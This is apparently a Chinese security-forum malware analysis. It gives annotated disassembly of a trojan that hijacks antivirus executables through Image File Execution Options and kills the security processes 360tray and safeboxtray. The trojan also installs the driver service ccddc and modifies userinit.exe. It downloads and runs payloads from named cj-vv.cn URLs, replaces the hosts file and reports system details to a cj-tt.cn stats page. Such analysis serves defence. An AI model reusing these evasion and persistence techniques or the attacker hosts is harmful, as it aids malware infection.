0040374F 393D 90444000 cmp dword ptr [404490], edi
00403755 74 2F je short 00403786
00403757 A1 94444000 mov eax, dword ptr [404494]
0040375C 3BC7 cmp eax, edi
0040375E 74 26 je short 00403786
00403760 8D4D F4 lea ecx, dword ptr [ebp-C]
00403763 57 push edi
00403764 51 push ecx
00403765 57 push edi
00403766 57 push edi
00403767 FF35 D4464000 push dword ptr [4046D4]
0040376D 50 push eax
0040376E 68 1C002200 push 22001C
00403773 53 push ebx
00403774 FF15 B8104000 call dword ptr [4010B8] ; 通过DeviceIoControl向系统发送控制码码IoControlCode为22001C，修改userinit.exe
0040377A FF35 D0464000 push dword ptr [4046D0] ; gr.00407AA0
00403780 FF15 BC104000 call dword ptr [4010BC] ; kernel32.FreeResource
00403786 53 push ebx
00403787 FF15 DC104000 call dword ptr [4010DC] ; kernel32.CloseHandle
0040378D 6A 04 push 4
0040378F 57 push edi
00403790 56 push esi
00403791 8B35 C0104000 mov esi, dword ptr [4010C0]
00403797 FFD6 call esi ; 通过MoveFileExA移动文件%temp%\~74e66a.tmp达到重起删除

复制代码[font=-apple-system, BlinkMacSystemFont, &quot]11.注册表映像劫持劫持egui.exe劫持指向services.exe

00403A76 E8 C4010000 call 00403C3F ; 解密字符串"egui.exe"
00403A7B 8D45 F4 lea eax, dword ptr [ebp-C]
00403A7E 50 push eax
00403A7F E8 2B020000 call 00403CAF ; 将egui.exe劫持指向services.exe
进入call代码
00403CAF 55 push ebp
00403CB0 8BEC mov ebp, esp
00403CB2 81EC D8000000 sub esp, 0D8
00403CB8 56 push esi
00403CB9 57 push edi
00403CBA 6A 12 push 12
00403CBC BE 60344000 mov esi, 00403460 ; ASCII "SOFTWARE\Microsoft\Windows NT\currentVersion\image file Execution options"
00403CC1 59 pop ecx
00403CC2 8DBD 28FFFFFF lea edi, dword ptr [ebp-D8]
00403CC8 F3:A5 rep movs dword ptr es:[edi], dword p>
00403CCA 66:A5 movs word ptr es:[edi], word ptr [esi>
00403CCC A4 movs byte ptr es:[edi], byte ptr [esi>
00403CCD 33C0 xor eax, eax
00403CCF 8DBD 73FFFFFF lea edi, dword ptr [ebp-8D]
00403CD5 AB stos dword ptr es:[edi]
00403CD6 AB stos dword ptr es:[edi]
00403CD7 AB stos dword ptr es:[edi]
00403CD8 8065 84 00 and byte ptr [ebp-7C], 0
00403CDC 6A 1D push 1D
00403CDE 66:AB stos word ptr es:[edi]
00403CE0 AA stos byte ptr es:[edi]
00403CE1 59 pop ecx
00403CE2 33C0 xor eax, eax
00403CE4 8D7D 85 lea edi, dword ptr [ebp-7B]
00403CE7 F3:AB rep stos dword ptr es:[edi]
00403CE9 66:AB stos word ptr es:[edi]
00403CEB AA stos byte ptr es:[edi]
00403CEC 8D85 28FFFFFF lea eax, dword ptr [ebp-D8]
00403CF2 50 push eax
00403CF3 8D45 84 lea eax, dword ptr [ebp-7C]
00403CF6 50 push eax
00403CF7 FF15 74104000 call dword ptr [401074] ; kernel32.lstrcpyA
00403CFD FF75 08 push dword ptr [ebp+8]
00403D00 8D45 84 lea eax, dword ptr [ebp-7C]
00403D03 50 push eax
00403D04 FF15 D8104000 call dword ptr [4010D8] ; 连接字符串"SOFTWARE\Microsoft\Windows NT\currentVersion\image file Execution options"与"egui.exe"
00403D0A 8D45 FC lea eax, dword ptr [ebp-4]
00403D0D 50 push eax
00403D0E 8D45 84 lea eax, dword ptr [ebp-7C]
00403D11 50 push eax
00403D12 68 02000080 push 80000002
00403D17 FF15 20104000 call dword ptr [401020] ; 创建注册表“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\currentVersion\image file Execution options\egui.exe”
00403D1D 8B35 A8104000 mov esi, dword ptr [4010A8] ; kernel32.Sleep
00403D23 6A 01 push 1
00403D25 FFD6 call esi
00403D27 6A 01 push 1
00403D29 FFD6 call esi
00403D2B BE F8324000 mov esi, 004032F8 ; ASCII "services.exe"
00403D30 56 push esi
00403D31 FF15 6C104000 call dword ptr [40106C] ; kernel32.lstrlenA
00403D37 40 inc eax
00403D38 50 push eax
00403D39 56 push esi
00403D3A 6A 01 push 1
00403D3C 6A 00 push 0
00403D3E 68 54344000 push 00403454 ; ASCII "Debugger"
00403D43 FF75 FC push dword ptr [ebp-4]
00403D46 FF15 1C104000 call dword ptr [40101C] ; 设置注册表键值Debugger值为“services.exe”

复制代码[font=-apple-system, BlinkMacSystemFont, &quot]文件: ~4a8d76.t[font=-apple-system, BlinkMacSystemFont, &quot]大小: 12288 字节[font=-apple-system, BlinkMacSystemFont, &quot]SHA1: 38BD179FF54C6D064533D88D9908C232DE8B125D[font=-apple-system, BlinkMacSystemFont, &quot]简单分析[font=-apple-system, BlinkMacSystemFont, &quot]1.尝试打开服务ccddc，如果服务存在则删除

10001010 FF15 1C300010 call dword ptr [<&ADVAPI32.OpenSCMana>; 打开服务管理器
10001016 8BF8 mov edi, eax
10001018 85FF test edi, edi
1000101A 74 33 je short 1000104F
1000101C 68 FF010F00 push 0F01FF
10001021 68 20490010 push 10004920 ; ASCII "ccddc"
10001026 57 push edi
10001027 FF15 18300010 call dword ptr [<&ADVAPI32.OpenServic>; 打开服务ccddc
1000102D 57 push edi
1000102E 8B3D 14300010 mov edi, dword ptr [<&ADVAPI32.Close>; ADVAPI32.CloseServiceHandle
10001034 8BF0 mov esi, eax
10001036 FFD7 call edi
10001038 85F6 test esi, esi
1000103A 74 13 je short 1000104F ; 若服务不存在跳1000104F
1000103C 53 push ebx
1000103D 56 push esi
1000103E FF15 10300010 call dword ptr [<&ADVAPI32.DeleteServ>; 如果服务存在则删除服务

复制代码[font=-apple-system, BlinkMacSystemFont, &quot]2.创建服务ccddc

10001060 56 push esi
10001061 57 push edi
10001062 E8 99FFFFFF call 10001000
10001067 68 3F000F00 push 0F003F
1000106C 6A 00 push 0
1000106E 6A 00 push 0
10001070 FF15 1C300010 call dword ptr [<&ADVAPI32.OpenSCMana>; ADVAPI32.OpenSCManagerA
10001076 8BF0 mov esi, eax
10001078 85F6 test esi, esi
1000107A 74 53 je short 100010CF
1000107C 8A4C24 10 mov cl, byte ptr [esp+10]
10001080 8B4424 0C mov eax, dword ptr [esp+C]
10001084 FEC9 dec cl
10001086 6A 00 push 0
10001088 F6D9 neg cl
1000108A 6A 00 push 0
1000108C 6A 00 push 0
1000108E 1BC9 sbb ecx, ecx
10001090 6A 00 push 0
10001092 83E1 FE and ecx, FFFFFFFE
10001095 6A 00 push 0
10001097 50 push eax
10001098 83C1 03 add ecx, 3
1000109B 6A 01 push 1
1000109D 51 push ecx
1000109E 6A 01 push 1
100010A0 68 FF010F00 push 0F01FF
100010A5 68 20490010 push 10004920 ; ASCII "ccddc"
100010AA 68 20490010 push 10004920 ; ASCII "ccddc"
100010AF 56 push esi
100010B0 FF15 20300010 call dword ptr [<&ADVAPI32.CreateServ>; 创建服务ccddc
100010B6 56 push esi
100010B7 8B35 14300010 mov esi, dword ptr [<&ADVAPI32.Close>; ADVAPI32.CloseServiceHandle
100010BD 8BF8 mov edi, eax
100010BF FFD6 call esi
100010C1 85FF test edi, edi
……
100010E0 56 push esi ; kernel32.CreateFileA
100010E1 57 push edi
100010E2 68 3F000F00 push 0F003F
100010E7 6A 00 push 0
100010E9 6A 00 push 0
100010EB FF15 1C300010 call dword ptr [<&ADVAPI32.OpenSCMana>; ADVAPI32.OpenSCManagerA
100010F1 8BF0 mov esi, eax
100010F3 85F6 test esi, esi
100010F5 74 53 je short 1000114A
100010F7 68 FF010F00 push 0F01FF
100010FC 68 20490010 push 10004920 ; ASCII "ccddc"
10001101 56 push esi
10001102 FF15 18300010 call dword ptr [<&ADVAPI32.OpenServic>; 打开服务ccddc
10001108 56 push esi
10001109 8B35 14300010 mov esi, dword ptr [<&ADVAPI32.Close>; ADVAPI32.CloseServiceHandle
1000110F 8BF8 mov edi, eax
10001111 FFD6 call esi
10001113 85FF test edi, edi
10001115 74 33 je short 1000114A
10001117 53 push ebx
10001118 6A 00 push 0
1000111A 6A 00 push 0
1000111C 57 push edi
1000111D FF15 24300010 call dword ptr [<&ADVAPI32.StartServi>; 启动服务

复制代码[font=-apple-system, BlinkMacSystemFont, &quot]3.加载驱动

1000131B 68 30490010 push 10004930 ; ASCII "\\.\ccddc"
10001320 FFD6 call esi ; 尝试打开一个设备"\\.\ccddc"
10001322 83F8 FF cmp eax, -1
10001325 A3 1C490010 mov dword ptr [1000491C], eax
1000132A 75 0A jnz short 10001336 ; 如果设备不存在跳10001336
1000132C 32C0 xor al, al
1000132E 5E pop esi
1000132F 81C4 08010000 add esp, 108
10001335 C3 retn
10001336 8D5424 04 lea edx, dword ptr [esp+4]
1000133A 6A 00 push 0
1000133C 52 push edx
1000133D 6A 00 push 0
1000133F 6A 00 push 0
10001341 6A 00 push 0
10001343 6A 00 push 0
10001345 68 48201080 push 80102048
1000134A 50 push eax
1000134B FF15 A0300010 call dword ptr [<&KERNEL32.DeviceIoCo>; 通过DeviceIoControl操作向驱动发送80102048的IoControlCode

复制代码[font=-apple-system, BlinkMacSystemFont, &quot]4.查找进程safeboxtray.exe和360tray.exe，如果存在则TerminateProcess结束进程，通过驱动通信恢复SSDT

10001D55 55 push ebp
10001D56 51 push ecx
10001D57 895424 2C mov dword ptr [esp+2C], edx
10001D5B 894424 30 mov dword ptr [esp+30], eax
10001D5F E8 3CF7FFFF call 100014A0 ; 解密字符串“360tray.exe”
10001D64 8D5424 24 lea edx, dword ptr [esp+24]
10001D68 52 push edx
10001D69 E8 32F7FFFF call 100014A0 ; 解密字符串“safeboxtray.exe”
10001D6E 83C4 08 add esp, 8
10001D71 C74424 0C 00000>mov dword ptr [esp+C], 0
10001D79 6A 00 push 0
10001D7B 6A 02 push 2
10001D7D E8 EA020000 call <jmp.&KERNEL32.CreateToolhelp32S>;创建系统快照
10001D82 8BE8 mov ebp, eax
10001D84 83FD FF cmp ebp, -1
10001D87 896C24 08 mov dword ptr [esp+8], ebp
10001D8B 75 0A jnz short 10001D97
10001D8D 33C0 xor eax, eax
10001D8F 5D pop ebp
10001D90 81C4 54010000 add esp, 154
10001D96 C3 retn
10001D97 8D4424 30 lea eax, dword ptr [esp+30]
10001D9B 56 push esi
10001D9C 50 push eax
10001D9D 55 push ebp
10001D9E C74424 3C 28010>mov dword ptr [esp+3C], 128
10001DA6 E8 BB020000 call <jmp.&KERNEL32.Process32First>
10001DAB 8B35 90300010 mov esi, dword ptr [<&KERNEL32.Close>; kernel32.CloseHandle
10001DB1 85C0 test eax, eax
10001DB3 0F84 93000000 je 10001E4C
10001DB9 8B2D 5C300010 mov ebp, dword ptr [<&KERNEL32.lstrc>; kernel32.lstrcmpiA
10001DBF 53 push ebx
10001DC0 8B1D 58300010 mov ebx, dword ptr [<&KERNEL32.Termi>; kernel32.TerminateProcess
10001DC6 57 push edi
10001DC7 8B3D A0300010 mov edi, dword ptr [<&KERNEL32.Devic>; kernel32.DeviceIoControl
10001DCD EB 06 jmp short 10001DD5
10001DCF 8B2D 5C300010 mov ebp, dword ptr [<&KERNEL32.lstrc>; kernel32.lstrcmpiA
10001DD5 8D4C24 2C lea ecx, dword ptr [esp+2C]
10001DD9 8D5424 60 lea edx, dword ptr [esp+60]
10001DDD 51 push ecx
10001DDE 52 push edx
10001DDF FFD5 call ebp ; 比较
10001DE1 8BD0 mov edx, eax
10001DE3 8D4424 20 lea eax, dword ptr [esp+20]
10001DE7 F7DA neg edx
10001DE9 1BD2 sbb edx, edx
10001DEB 8D4C24 60 lea ecx, dword ptr [esp+60]
10001DEF 42 inc edx
10001DF0 50 push eax
10001DF1 51 push ecx
10001DF2 895424 24 mov dword ptr [esp+24], edx
10001DF6 FFD5 call ebp ; 比较
10001DF8 8B5424 1C mov edx, dword ptr [esp+1C]
10001DFC F7D8 neg eax
10001DFE 1BC0 sbb eax, eax
10001E00 40 inc eax
10001E01 0BD0 or edx, eax
10001E03 74 32 je short 10001E37 ; 如果不存在跳10001E37
10001E05 8D4424 18 lea eax, dword ptr [esp+18]
10001E09 6A 00 push 0
10001E0B 50 push eax
10001E0C A1 1C490010 mov eax, dword ptr [1000491C]
10001E11 8D4C24 18 lea ecx, dword ptr [esp+18]
10001E15 6A 04 push 4
10001E17 51 push ecx
10001E18 8D5424 54 lea edx, dword ptr [esp+54]
10001E1C 6A 04 push 4
10001E1E 52 push edx
10001E1F 68 00010000 push 100
10001E24 50 push eax
10001E25 FFD7 call edi ; 通过DeviceIoControl向设备发送操作码，恢复SSDT
10001E27 8B4C24 10 mov ecx, dword ptr [esp+10]
10001E2B 6A 00 push 0
10001E2D 51 push ecx
10001E2E FFD3 call ebx ; TerminateProcess结束进程
10001E30 8B5424 10 mov edx, dword ptr [esp+10]
10001E34 52 push edx
10001E35 FFD6 call esi
10001E37 8B6C24 14 mov ebp, dword ptr [esp+14]
10001E3B 8D4424 3C lea eax, dword ptr [esp+3C]
10001E3F 50 push eax
10001E40 55 push ebp
10001E41 E8 1A020000 call <jmp.&KERNEL32.Process32Next>
10001E46 85C0 test eax, eax
10001E48 ^ 75 85 jnz short 10001DCF ; 跳10001DCF比较下一个

复制代码[font=-apple-system, BlinkMacSystemFont, &quot]5.创建线程，主线程挂起

10001CE6 FF15 50300010 call dword ptr [<&KERNEL32.CreateThre>; kernel32.CreateThread
10001CEC 8BF0 mov esi, eax
10001CEE 6A FF push -1
10001CF0 56 push esi
10001CF1 FF15 4C300010 call dword ptr [<&KERNEL32.WaitForSin>; kernel32.WaitForSingleObject

复制代码[font=-apple-system, BlinkMacSystemFont, &quot]线程执行[font=-apple-system, BlinkMacSystemFont, &quot]注册表映像劫持avp.exe

77DCBCF7 E8 E82CFEFF call RegCreateKeyExA
00C9FE70 80000002 |hKey = HKEY_LOCAL_MACHINE
00C9FE74 00C9FF10 |Subkey = "SOFTWARE\Microsoft\Windows NT\currentVersion\image file Execution options\avp.exe"
00C9FE78 00000000 |Reserved = 0
00C9FE7C 00000000 |Class = NULL
00C9FE80 00000000 |Options = REG_OPTION_NON_VOLATILE
00C9FE84 02000000 |Access = 2000000
00C9FE88 00000000 |pSecurity = NULL
00C9FE8C 00C9FEB0 |pHandle = 00C9FEB0
00C9FE90 00000000 \pDisposition = NULL

复制代码[font=-apple-system, BlinkMacSystemFont, &quot]设置参数Debugger的值为“services.exe”

100014FD BE 48490010 mov esi, 10004948 ; ASCII "SOFTWARE\Microsoft\Windows NT\currentVersion\image file Execution options"
10001502 8D7C24 0C lea edi, dword ptr [esp+C]
10001506 33C0 xor eax, eax
10001508 F3:A5 rep movs dword ptr es:[edi], dword p>
1000150A 66:A5 movs word ptr es:[edi], word ptr [esi>
1000150C A4 movs byte ptr es:[edi], byte ptr [esi>
1000150D 894424 57 mov dword ptr [esp+57], eax
10001511 B9 1D000000 mov ecx, 1D
10001516 894424 5B mov dword ptr [esp+5B], eax
1000151A 8D7C24 69 lea edi, dword ptr [esp+69]
1000151E 894424 5F mov dword ptr [esp+5F], eax
10001522 8D5424 68 lea edx, dword ptr [esp+68]
10001526 66:894424 63 mov word ptr [esp+63], ax
1000152B 884424 65 mov byte ptr [esp+65], al
1000152F 884424 68 mov byte ptr [esp+68], al
10001533 F3:AB rep stos dword ptr es:[edi]
10001535 66:AB stos word ptr es:[edi]
10001537 8D4C24 0C lea ecx, dword ptr [esp+C]
1000153B 51 push ecx
1000153C 52 push edx
1000153D AA stos byte ptr es:[edi]
1000153E FF15 2C300010 call dword ptr [<&KERNEL32.lstrcpyA>] ; kernel32.lstrcpyA
10001544 8B8424 E4000000 mov eax, dword ptr [esp+E4]
1000154B 8D4C24 68 lea ecx, dword ptr [esp+68]
1000154F 50 push eax
10001550 51 push ecx
10001551 FF15 54300010 call dword ptr [<&KERNEL32.lstrcatA>] ; kernel32.lstrcatA
10001557 8D5424 08 lea edx, dword ptr [esp+8]
1000155B 8D4424 68 lea eax, dword ptr [esp+68]
1000155F 52 push edx
10001560 50 push eax
10001561 68 02000080 push 80000002
10001566 FF15 04300010 call dword ptr [<&ADVAPI32.RegCreateK>; ADVAPI32.RegCreateKeyA
1000156C 68 10400010 push 10004010 ; ASCII "services.exe"
10001571 FF15 80300010 call dword ptr [<&KERNEL32.lstrlenA>] ; kernel32.lstrlenA
10001577 8B4C24 08 mov ecx, dword ptr [esp+8]
1000157B 40 inc eax
1000157C 50 push eax
1000157D 68 10400010 push 10004010 ; ASCII "services.exe"
10001582 6A 01 push 1
10001584 6A 00 push 0
10001586 68 3C490010 push 1000493C ; ASCII "Debugger"
1000158B 51 push ecx
1000158C FF15 08300010 call dword ptr [<&ADVAPI32.RegSetValu>; 设置参数Debugger的值为"services.exe"

复制代码[font=-apple-system, BlinkMacSystemFont, &quot]退出线程

7C80B714 E8 CF090000 call ExitThread

复制代码[font=-apple-system, BlinkMacSystemFont, &quot]文件: ~7c963f.exe[font=-apple-system, BlinkMacSystemFont, &quot]大小: 6656 字节[font=-apple-system, BlinkMacSystemFont, &quot]SHA1: CE83672B18A84470059B78815D864DCA04507B2D[font=-apple-system, BlinkMacSystemFont, &quot]简单分析：[font=-apple-system, BlinkMacSystemFont, &quot]1.判断自身是否为userinit.exe

004012E4 |. 6A 64 push 64 ; /BufSize = 64 (100.)
004012E6 |. 33DB xor ebx, ebx ; |
004012E8 |. 50 push eax ; |PathBuffer
004012E9 |. 53 push ebx ; |hModule => NULL
004012EA |. 66:A5 movs word ptr es:[edi], word ptr [esi>; |
004012EC |. FF15 0C104000 call dword ptr [<&KERNEL32.GetModuleF>; \获取自身完整路径
004012F2 |. 8D45 E8 lea eax, dword ptr [ebp-18]
004012F5 |. 50 push eax
004012F6 |. E8 96000000 call 00401391 ; 解密字符串“userinit”.
004012FB |. 8D45 E8 lea eax, dword ptr [ebp-18]
004012FE |. 50 push eax ; /s2
004012FF |. 8D85 4CFFFFFF lea eax, dword ptr [ebp-B4] ; |
00401305 |. 50 push eax ; |s1
00401306 |. E8 610A0000 call <jmp.&MSVCRT.strstr> ; \比较自身是否为userinit.exe
0040130B |. 83C4 0C add esp, 0C
0040130E |. 85C0 test eax, eax
00401310 |. 74 21 je short 00401333 ; 如果不是跳00401333
00401312 |. BE AC114000 mov esi, 004011AC ; ASCII "宏哓刎纫"
00401317 |. 8D7D F4 lea edi, dword ptr [ebp-C]
0040131A |. A5 movs dword ptr es:[edi], dword ptr [e>
0040131B |. A5 movs dword ptr es:[edi], dword ptr [e>
0040131C |. 8D45 F4 lea eax, dword ptr [ebp-C]
0040131F |. 50 push eax
00401320 |. A4 movs byte ptr es:[edi], byte ptr [esi>
00401321 |. E8 6B000000 call 00401391
00401326 |. 59 pop ecx
00401327 |. 8D45 F4 lea eax, dword ptr [ebp-C]
0040132A |. 6A 05 push 5 ; /ShowState = SW_SHOW
0040132C |. 50 push eax ; |CmdLine
0040132D |. FF15 08104000 call dword ptr [<&KERNEL32.WinExec>] ; \如果是则运行explorer.exe方式为SW_SHOW（隐藏）

复制代码[font=-apple-system, BlinkMacSystemFont, &quot]2.动态加载urlmon.dll导出URLDownloadToFileA函数

00401BD3 55 push ebp
00401BD4 8BEC mov ebp, esp
00401BD6 83EC 20 sub esp, 20
00401BD9 56 push esi
00401BDA 57 push edi
00401BDB FF15 44104000 call dword ptr [<&KERNEL32.GetTickCou>; kernel32.GetTickCount
00401BE1 BE A0124000 mov esi, 004012A0
00401BE6 8D7D E0 lea edi, dword ptr [ebp-20]
00401BE9 A5 movs dword ptr es:[edi], dword ptr [e>
00401BEA A5 movs dword ptr es:[edi], dword ptr [e>
00401BEB A5 movs dword ptr es:[edi], dword ptr [e>
00401BEC A5 movs dword ptr es:[edi], dword ptr [e>
00401BED 66:A5 movs word ptr es:[edi], word ptr [esi>
00401BEF A3 9C1D4000 mov dword ptr [401D9C], eax
00401BF4 8D45 E0 lea eax, dword ptr [ebp-20]
00401BF7 50 push eax
00401BF8 A4 movs byte ptr es:[edi], byte ptr [esi>
00401BF9 E8 93F7FFFF call 00401391 ; 解密字符串"URLDownloadToFileA"
00401BFE BE 94124000 mov esi, 00401294
00401C03 8D7D F4 lea edi, dword ptr [ebp-C]
00401C06 A5 movs dword ptr es:[edi], dword ptr [e>
00401C07 A5 movs dword ptr es:[edi], dword ptr [e>
00401C08 66:A5 movs word ptr es:[edi], word ptr [esi>
00401C0A 8D45 F4 lea eax, dword ptr [ebp-C]
00401C0D 50 push eax
00401C0E A4 movs byte ptr es:[edi], byte ptr [esi>
00401C0F E8 7DF7FFFF call 00401391 ; 解密字符串"urlmon.dll"
00401C14 59 pop ecx
00401C15 8D45 E0 lea eax, dword ptr [ebp-20]
00401C18 59 pop ecx
00401C19 50 push eax
00401C1A 8D45 F4 lea eax, dword ptr [ebp-C]
00401C1D 50 push eax
00401C1E FF15 14104000 call dword ptr [<&KERNEL32.LoadLibrar>; 加载urlmon.dll
00401C24 50 push eax
00401C25 FF15 10104000 call dword ptr [<&KERNEL32.GetProcAdd>; 导出函数URLDownloadToFileA

复制代码[font=-apple-system, BlinkMacSystemFont, &quot]2.解密下载列表调用URLDownloadToFileA联网下载到本地并执行

00401C30 E8 76FEFFFF call 00401AAB
进入call代码
00401AAB /$ 55 push ebp
00401AAC |. 8BEC mov ebp, esp
00401AAE |. 81EC C8000000 sub esp, 0C8
00401AB4 |. 8D85 38FFFFFF lea eax, dword ptr [ebp-C8]
00401ABA |. 56 push esi
00401ABB |. 50 push eax ; /Buffer
00401ABC |. 6A 64 push 64 ; |BufSize = 64 (100.)
00401ABE |. FF15 40104000 call dword ptr [<&KERNEL32.GetTempPat>; \获取临时文件夹目录
00401AC4 |. FF15 44104000 call dword ptr [<&KERNEL32.GetTickCou>; [GetTickCount
00401ACA |. 50 push eax ; /<%x>
00401ACB |. 8D85 38FFFFFF lea eax, dword ptr [ebp-C8] ; |
00401AD1 |. 50 push eax ; |<%s>
00401AD2 |. 8D45 9C lea eax, dword ptr [ebp-64] ; |
00401AD5 |. 68 88124000 push 00401288 ; |Format = "%s~%x.tmp"
00401ADA |. 50 push eax ; |s
00401ADB |. FF15 78104000 call dword ptr [<&USER32.wsprintfA>] ; \得到本地地址%Temp%\~490ee1.tmp
00401AE1 |. BE 84104000 mov esi, 00401084
00401AE6 |. 56 push esi
00401AE7 |. E8 D8FCFFFF call 004017C4 ; 解密得到下载列表"http://txt.cj-vv.cn:889/txt1/ok.txt"保存为%Temp%\~490ee1.tmp
00401AEC |. 6A 00 push 0
00401AEE |. 8D45 9C lea eax, dword ptr [ebp-64]
00401AF1 |. 6A 64 push 64
00401AF3 |. 50 push eax
00401AF4 |. 56 push esi
00401AF5 |. E8 3BFEFFFF call 00401935 ; 调用URLDownloadToFileA联网
00401AFA |. 8D45 9C lea eax, dword ptr [ebp-64]
00401AFD |. 50 push eax
00401AFE |. E8 C1FEFFFF call 004019C4 ; 以mode为r的形式打开只读文件%Temp%\~490ee1.tmp，然后fgets从文件中度取，通过调用URLDownloadToFileA下载保存到本地%Temp%\???????（随机数字），然后执行，两个下载时间之间暂停10秒

复制代码[font=-apple-system, BlinkMacSystemFont, &quot]3.下载文件替换hosts文件

00401C35 E8 FAFBFFFF call 00401834
进入call代码
0040185E |. E8 A8020000 call 00401B0B ; 解密字符串"\drivers\etc\hosts"
00401863 |. 8D45 B8 lea eax, dword ptr [ebp-48] ; |
00401866 |. C70424 040100>mov dword ptr [esp], 104 ; |
0040186D |. 50 push eax ; |Buffer
0040186E |. FF15 24104000 call dword ptr [<&KERNEL32.GetSystemD>; \获取系统文件夹目录%system%\
00401874 |. 8D45 EC lea eax, dword ptr [ebp-14]
00401877 |. 50 push eax ; /StringToAdd
00401878 |. 8D45 B8 lea eax, dword ptr [ebp-48] ; |
0040187B |. 50 push eax ; |ConcatString
0040187C |. FF15 20104000 call dword ptr [<&KERNEL32.lstrcatA>] ; \连接字符串得到路径%system%\drivers\etc\hosts
00401882 |. BE F8104000 mov esi, 004010F8
00401887 |. 56 push esi
00401888 |. E8 37FFFFFF call 004017C4 ; 解密得到下载地址"http://up.cj-vv.cn:889/jpg1/ad.jpg"
0040188D |. 6A 00 push 0
0040188F |. 8D45 B8 lea eax, dword ptr [ebp-48]
00401892 |. 6A 0A push 0A
00401894 |. 50 push eax
00401895 |. 56 push esi
00401896 |. E8 9A000000 call 00401935 ; 调用URLDownloadToFileA下载，保存为%system%\drivers\etc\hosts，替换掉系统本身hosts文件

复制代码[font=-apple-system, BlinkMacSystemFont, &quot]4.获取系统信息发送http://tt.cj-tt.cn:889/newmc/getmac.asp[font=-apple-system, BlinkMacSystemFont, &quot]作感染统计

00401C3A E8 C6FBFFFF call 00401805
进入call代码
00401805 /$ 56 push esi
00401806 |. 57 push edi
00401807 |. BF B8104000 mov edi, 004010B8
0040180C |. 57 push edi
0040180D |. E8 B2FFFFFF call 004017C4 ; 解密字符串"http://tt.cj-tt.cn:889/newmc/getmac.asp"
00401812 |. BE 841D4000 mov esi, 00401D84
00401817 |. 56 push esi
00401818 |. E8 C8FBFFFF call 004013E5 ; 加载ETAPI32.dll导出函数Netbios
0040181D |. 68 58124000 push 00401258
00401822 |. 56 push esi
00401823 |. 68 EC104000 push 004010EC ; ASCII "a1"
00401828 |. 57 push edi
00401829 |. E8 0CFDFFFF call 0040153A ; 获取系统信息发送"http://tt.cj-tt.cn:889/newmc/getmac.asp"

复制代码

本帖最近评分记录：共 1 条评分飞扬币 +50